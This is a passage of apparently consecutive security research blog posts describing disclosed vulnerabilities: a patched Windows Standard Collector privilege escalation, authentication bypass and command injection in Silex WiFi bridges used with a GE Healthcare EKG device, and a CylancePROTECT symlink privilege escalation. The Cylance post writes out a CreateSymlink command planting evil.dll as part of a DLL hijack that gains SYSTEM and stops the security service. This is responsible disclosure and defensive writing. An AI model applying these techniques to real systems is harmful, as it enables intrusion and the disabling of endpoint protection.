After this bug was patched as part of the August 2018 Patch Tuesday, I began reversing the patch, which was relatively simple. As expected, the patch simply added CoImpersonateClient calls prior to the previously vulnerable file operations, specifically the CommitPackagingResult function in DiagnosticsHub.StandardCollector.Runtime.dll:

Report folder being created with impersation

Report folder being created with impersation

CoImpersonateClient added to CommitPackagingResult in DiagnosticsHub.StandardCollector.Runtime.dll

CoImpersonateClient added to CommitPackagingResult in DiagnosticsHub.StandardCollector.Runtime.dll

As previously mentioned in the Cylance privilege escalation write-up, protecting against symlink attacks may seem easy, but is often times overlooked. Any time a privileged service is performing file operations on behalf of a user, proper impersonation is needed in order to prevent these types of attacks.

Upon finding this vulnerability, MSRC was contacted with the vulnerability details and PoC. MSRC quickly triaged and validated the finding and provided regular updates throughout the remediation process. The full disclosure timeline can be found in the Atredis advisory link below.

If you have any questions or comments, feel free to reach out to me on Twitter: @ryHanson

Atredis Partners has assigned this vulnerability the advisory ID: ATREDIS-2018-0004

The CVE assigned to this vulnerability is: CVE-2018-0952

CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service

GE Healthcare MAC 5500 Vulnerabilities

15 May 2018 at 16:29
A GE Healthcare MAC 5500

A GE Healthcare MAC 5500

A few months ago, Atredis Partners had an opportunity to look at the GE Healthcare MAC5500 Electrocardiography device. This device connects to a hospital network to transfer reports to a centralized server, simplifying the workflow for EKG measurements. To facilitate transfer of this data, GE Healthcare offers MobileLink, a WiFi enabled solution for collecting measurements.

The MAC5500 device does not directly connect to a WiFi network. Instead, it uses a serial to WiFi bridge made by Silex Technology. Two models of this bridge are supported by MobileLink: the SDS-500 and SD-320AN. Atredis Partners identified vulnerabilities in these devices that allow for authentication bypass and remote command execution. These vulnerabilities resulted in ICS-CERT advisory ICSMA-18-128-01. Atredis Partners disclosed these vulnerabilities according to our disclosure policy. Silex and GE Healthcare have provided a firmware update which resolves the code execution flaw and updated their documentation for the authentication bypass issue.

SDS-500 Authentication Bypass (CVE-2018-6020)

The first vulnerability is an authentication bypass for the SDS-500 device. The SDS-500 device uses bearer token authentication to validate that a user has logged in and has access to a given resource. 

The check for this token is only performed for HTTP GET requests. HTTP POST requests, which are used to change device settings, are allowed without the token. The device administrator can configure an "update" password to force authentication of POST requests, but this feature is disabled by default.

By performing a POST request, an attacker can change any device setting. This includes the ability to change the device password. In a clinical environment, this may lead to a loss of availability if the device's parameters are modified.

SD-320AN Command Injection (CVE-2018-6021)

The SD-320AN is a newer serial to WiFi bridge made by Silex, and is replacing the SDS-500 for some MobileLink applications. Unlike the older SDS-500, the SD-320AN runs a Linux based operating system.

The SD-320AN is configured via a web interface, which is implemented by a CGI application written in C. In reviewing the application, multiple calls to system() were identified. A command injection vulnerability was found in one of these calls.

The SD-320AN firmware update package was found on the Silex website. This update package is a ZIP file that contains a firmware image named "SD-320.bin". Running the binwalk utility on this file indicates that it contains a bzip2-compressed Linux filesystem starting at offset zero. 

Output of Binwalk for Firmware Image

Output of Binwalk for Firmware Image

The CGI application is a 32-bit ARM executable located at /usr/share/www/ssi. This executable was loaded into IDA Pro and all references to the system() function were examined.

Vulnerable Call to system()

Vulnerable Call to system()

In one instance, the system() function is used to set the PIN code for Wi-Fi Protected Setup (WPS) using the the WL_PINCODE_ENRO POST parameter. This value is automatically generated by the client-side Javascript in the web application and submitted in the POST request to change this setting. An attacker can send an arbitrary value for this parameter, which poisons the parameters to the system() call, allowing remote command execution on the SD-320AN.

Command Injection Request

Command Injection Request

Command Injection Response

Command Injection Response


Medical devices with network connectivity pose a risk to hospital infrastructure. Security requirements for these devices are minimal and security may not be a high priority to the manufacturer. Third-party components such as the Silex bridges discussed in this article present an additional challenge to OEMs.

While the vulnerabilities discussed in this article do not pose a risk to human life, they may allow an attacker to gain persistence in a medical network. Since the vulnerabilities are relatively simple, they may also be abused in a botnet attack similar to Mirai.

Finally, command injection attacks are far too common on these types of devices. Whenever possible, calls to system() should be avoided and instead the execve() function should be used with constant executable paths. While parameter injection attacks are still possible with execve(), this change would prevent many common command injection attacks and would have avoided the vulnerability presented here.

Atredis Partners would like to thank GE Healthcare for their prompt response to our advisory and to Silex Technology for confirming and responding to the reported issues.

GE Healthcare MAC 5500 Vulnerabilities

Escalating Privileges with CylancePROTECT

1 May 2018 at 19:23

If you regularly perform penetration tests, red team exercises, or endpoint assessments, chances are you've probably encountered CylancePROTECT at some point. Depending on the CylancePROTECT policy configuration, your standard tools and techniques may not have worked as expected. I've ran into situations where the administrators of CylancePROTECT set the policy to be too relaxed and establishing a presence on the target system was trivial. With that said, I've also encountered targets where the policy was very strict and gaining a stable, reliable shell was not an easy task.

After a few frustrating CylancePROTECT encounters, I decided to install it locally and learn more about how it works to try and make my next encounter less frustrating. The majority of CylancePROTECT is written in .NET, so I started by firing up dnSpy, loaded the assemblies, and started looking around. I spent several nights and weekends casually looking through the codebase (which is quite massive) and found myself spending most of my time analyzing how the CylanceUI process communicated with the CylanceSvc process. My hope was that I would find a secret command I could use to stop the service as a user, but no such command exists (for users). However, I did find a privilege escalation vulnerability that could be triggered as a user via the inter-process communication ("IPC") channels.

Several commands can be sent to the CylanceSvc from the CylanceUI process via the tray menu, some of which are enabled by starting the UI with the advanced flag: CylanceUI.exe /advanced

CylanceUI Advanced Menu

CylanceUI Advanced Menu

Prior to starting a deeper investigation of the different menu options, I used Process Monitor to get high level view of how CylancePROTECT interacted with Windows when I clicked these menu options. My favorite option ended up being the logging verbosity, not only because it gave me an even deeper insight into what CylancePROTECT was doing, but also because it plays a major role in this privilege escalation vulnerability. The 'Check for Updates' option also caught my eye in procmon because it caused the CyUpdate process to spawn as SYSTEM.

CyUpdate Spawning as SYSTEM

CyUpdate Spawning as SYSTEM

The procmon output I witnessed at this point told me quite a bit and was what made me begin my hunt for a possible privilege escalation vulnerability. The three main indicators were:

  1. As a user, I could communicate with the CylanceSvc service and influences its behavior
  2. As a user, I could trigger the CyUpdate process to spawn with SYSTEM privileges
  3. As a user, I could cause the CylanceUI process to write to the same file/folder as the SYSTEM process
CylanceUI and CylanceSvc writing to log

CylanceUI and CylanceSvc writing to log

CyUpdate writing to log

CyUpdate writing to log

The third indicator is the most important. It’s not uncommon for a user process and system process to share the same resource, but it is uncommon for the user process to have full read/write permissions to that resource. I confirmed the permissions on the log folder and files with icacls:

Log folder and File Modify Permissions

Log folder and File Modify Permissions

Having modify permissions on a folder will allow for it to be setup as a mount point to redirect read/write operations to another location. I confirmed this by using James Forshaw's symboliclink-testing-tools to create a mount point, as well as try other symbolic link vectors. Before creating the mount point, I made sure to set CylancePROTECT’s log level to 'Error' to prevent additional logs from being created after I emptied the log folder.

Log folder mount point created

Log folder mount point created

After creating the mount point, I increased the log verbosity and confirmed the log file was created in the mount point target folder, C:\Windows.

CylanceSvc writing log to C:\Windows\

CylanceSvc writing log to C:\Windows\

CyUpdate change log file permissions

CyUpdate change log file permissions

Log file modify permissions

Log file modify permissions

Writing a log file to an arbitrary location is neat but doesn't demonstrate much impact or add value to an attack vector. To gain SYSTEM privileges with this vector, I needed to be able to control the filename that was written, as well as the contents of the file. Neither of these tasks can be accomplished by interacting with CylancePROTECT via the IPC channels. However, I was able to use one of Forshaw's clever symbolic link tricks to control the name of the file. This is done by using two symbolic links that are setup like this:

  1. C:\Program Files\Cylance\Desktop\log mount point folder points to the \RPC Control\ object directory.
  2. \RPC Control\2018-03-20.log symlink points to \??\C:\Windows\evil.dll

One of James' symbolic link testing tools will automatically create this symlink chain by simply specifying the original file and target destination, in this case the command looked like this, CreateSymlink.exe "C:\Program Files\Cylance\Desktop\log\2018-03-20.log" C:\Windows\evil.dll, and the result was:

Creating symlink chain to control filename

Creating symlink chain to control filename

File with arbitrary name created in C:\Windows

File with arbitrary name created in C:\Windows

At this point I've written a file to an arbitrary location with an arbitrary name and since the CyUpdate.exe process grants Users modify permissions on the "log file", I could overwrite the log contents with the contents of a DLL.

Contents of C:\Windows\evil.dll

Contents of C:\Windows\evil.dll

Verifying overwrite permissions

Verifying overwrite permissions

From here all I needed to get a SYSTEM shell was a DLL hijack in a SYSTEM service. I decided to target CylancePROTECT for this because I knew I could reliably spawn the CyUpdate process as a user. Leveraging Procmon again, I set my filters to:

  1. Path contains .dll
  2. Result contains NOT
  3. Process is CyUpdate.exe

The resulting output in procmon looked like this:

libc.dll hijack identified in procmon

libc.dll hijack identified in procmon

Now all I had to do was setup the chain again, but this time point the symlink to C:\Program Files\Cylance\Desktop\libc.dll (any of the highlighted locations would have worked). This symlink gave me a modifiable DLL that I could force CylancePROTECT to load and execute, resulting in a SYSTEM shell:

Gaining SYSTEM shell and stopping CylanceSvc

Gaining SYSTEM shell and stopping CylanceSvc

Elevating our privileges from a user to SYSTEM is great, but more importantly, we meet the conditions required to communicate with the CylancePROTECT kernel driver CYDETECT. This elevated privilege allows us to send the ENABLE_STOP IOCTL code to the kernel driver and gracefully stop the service. In the screenshot above, you’ll notice the CylanceSvc is stopped as a result of loading the DLL.

Privilege escalation vulnerabilities via symbolic links are quite common. James Forshaw has found many of them in Windows and other Microsoft products. The initial identification of these types of bugs can be performed without ever opening IDA or doing any sort of static analysis, as I’ve demonstrated above. With that said, it is still a good idea to find the offending code and determine if it’s within a library that affects multiple services or an isolated issue.

Preventing symbolic link attacks may not be as easy as you would think. From a developer’s perspective, these types of vulnerabilities don’t stand out like a SQLi, XSS, or RCE bug since they’re typically a hard to spot permissions issue. When privileged services need to share file system resources with low-privileged users, it is very important that the user permissions are minimal.

Upon finding this vulnerability, Cylance was contacted, and a collaborative effort was made through Bugcrowd to remediate the finding. Cylance responded to the submission quickly and validated the finding within a few days. The fix was deployed 40 days after the submission and was included in the 1470 release of CylancePROTECT.

If you have any questions or comments, feel free to reach out to me on Twitter: @ryHanson

Atredis Partners has assigned this vulnerability the advisory ID: ATREDIS-2018-0003.

The CVE assigned to this vulnerability is: CVE-2018-10722

Escalating Privileges with CylancePROTECT